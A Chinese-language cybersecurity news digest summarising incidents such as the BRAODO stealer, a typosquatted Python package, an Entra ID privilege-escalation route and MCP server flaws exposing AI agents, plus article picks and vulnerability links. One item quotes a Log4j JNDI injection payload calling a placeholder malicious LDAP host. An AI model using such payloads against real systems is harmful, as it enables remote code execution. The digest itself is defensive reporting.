全球网安事件速递

1. 美国顶尖红队竟是一台AI机器人

AI聊天机器人Xbow登顶HackerOne漏洞赏金排行榜，发现超1000个安全漏洞，表现超越人类黑客。专家警告AI加速漏洞利用将加剧网络安全威胁，呼吁防御者提升自动化应对能力，适应AI驱动的攻击新时代。【外刊-阅读原文】

2. 警惕微软Entra ID风险：访客账户存在隐蔽的权限提升策略

微软Entra ID存在订阅管理漏洞，访客用户可创建并转移订阅获取特权，利用计费角色绕过安全控制，威胁企业安全。建议审计访客账户、强化控制并监控异常订阅。【外刊-阅读原文】

3. 配置不当的MCP服务器使AI代理系统面临入侵风险

数百台MCP服务器因默认配置缺陷暴露命令执行漏洞，攻击者可利用未授权访问执行系统命令或污染AI模型上下文。Anthropic开发的MCP协议广泛用于AI代理，但缺乏强认证机制，导致"邻居劫持"风险。建议开发者严格验证输入、限制权限并监控数据源。【外刊-阅读原文】

4. SAP GUI加密缺陷致敏感数据面临泄露风险

SAP GUI界面存在严重安全漏洞，Windows和Java版本分别采用弱XOR加密和明文存储用户敏感数据，攻击者可轻易获取信息用于钓鱼或合规违规。SAP已发布补丁，但建议彻底禁用输入历史功能以消除风险。【外刊-阅读原文】

5. 新型BRAODO窃密木马滥用GitHub托管载荷以规避检测

ANY.RUN发现BRAODO窃密木马利用GitHub托管载荷，采用多层混淆和分阶段投递技术，规避检测。攻击链包括BAT启动、GitHub下载、持久化植入及Python最终载荷执行。建议加强行为监控和沙箱分析，应对新型威胁。【外刊-阅读原文】

6. 恶意Python包"psslib"实施拼写错误攻击，可强制关闭Windows系统

恶意Python包psslib仿冒passlib，输入错误密码或调用特定函数会强制关闭Windows系统，导致数据丢失和服务中断，专门针对Windows开发环境。【外刊-阅读原文】

7. nOAuth漏洞曝光两年后仍影响9%的微软Entra SaaS应用

微软Entra ID的nOAuth漏洞仍威胁9%的SaaS应用，攻击者可劫持账户并渗透Microsoft 365。开发者需正确实施身份验证，微软强调必须使用唯一标识符。Kubernetes配置错误同样带来AWS凭证泄露风险，凸显最小权限原则重要性。【外刊-阅读原文】

8. Quest修复KACE SMA严重漏洞 含CVSS 10分认证绕过高危缺陷

Quest Software紧急修复KACE SMA四大高危漏洞，包括CVSS 10.0满分认证绕过漏洞，攻击者可完全控制系统。其他漏洞涉及双因素认证绕过、恶意文件上传和许可证替换。建议用户立即更新受影响版本（14.1及以下）以防范风险。【外刊-阅读原文】

9. WhatsApp推出AI消息摘要功能 提升聊天预览效率

WhatsApp推出AI消息摘要功能，利用Meta AI技术私密汇总未读消息，支持高级隐私设置，通过隐私处理技术确保数据安全，目前仅限美国用户使用。【外刊-阅读原文】

10. Realtek蓝牙安全连接配对漏洞可导致攻击者发起拒绝服务攻击

Realtek RTL8762E SDK v1.4.0存在蓝牙配对协议漏洞，攻击者可利用未验证的配对随机数数据包触发拒绝服务，破坏安全连接。修复需强制消息顺序验证并更新固件。【外刊-阅读原文】

优质文章推荐

1. Burpsuite+Proxifier抓取程序数据包

本文详解Windows下使用Burpsuite+Proxifier抓取桌面程序HTTP/HTTPS流量的方法，涵盖代理设置、证书导入、规则配置及常见问题解决，适用于逆向分析和漏洞挖掘，强调仅限合法授权环境使用。【阅读原文】

2. Log4j漏洞

Apache Log4j2存在远程代码执行漏洞，攻击者通过构造恶意JNDI注入Payload（如${jndi:ldap://恶意URL}）触发RCE。影响2.x<2.15.0版本，涉及多个主流框架。修复方案为升级至2.15.0+版本，默认关闭lookup功能并限制JNDI协议白名单。【阅读原文】

3. Java代码审计中的SQL注入漏洞深度解析与组合攻击

SQL注入风险升级为RCE，涵盖数据泄露、权限提升等危害。详解Java中JDBC、MyBatis等场景漏洞及组合攻击链，提供预编译绕过技巧与分层防御方案，强调现代注入特点与防御方向。【阅读原文】

漏洞情报精华

1.NIPS 绿盟网络入侵防护系统 users.json 信息泄露漏洞

https://xvi.vulbox.com/detail/1937440988851212288

2.（CVE-2025-52936）SSLH后置链接漏洞

https://xvi.vulbox.com/detail/1937540437854261248

3.（CVE-2025-52969）ClickHouse权限提升和未授权代码执行漏洞

https://xvi.vulbox.com/detail/1937541092518006784

*本文内容收集自全球范围内的媒体与刊物，制作者对其完整性负责，但不对其真实性和有效性负责。

*标明为【外刊】的内容主要来源为英语国家的媒体与刊物，部分内容需要注册原链接平台账号后方可阅读。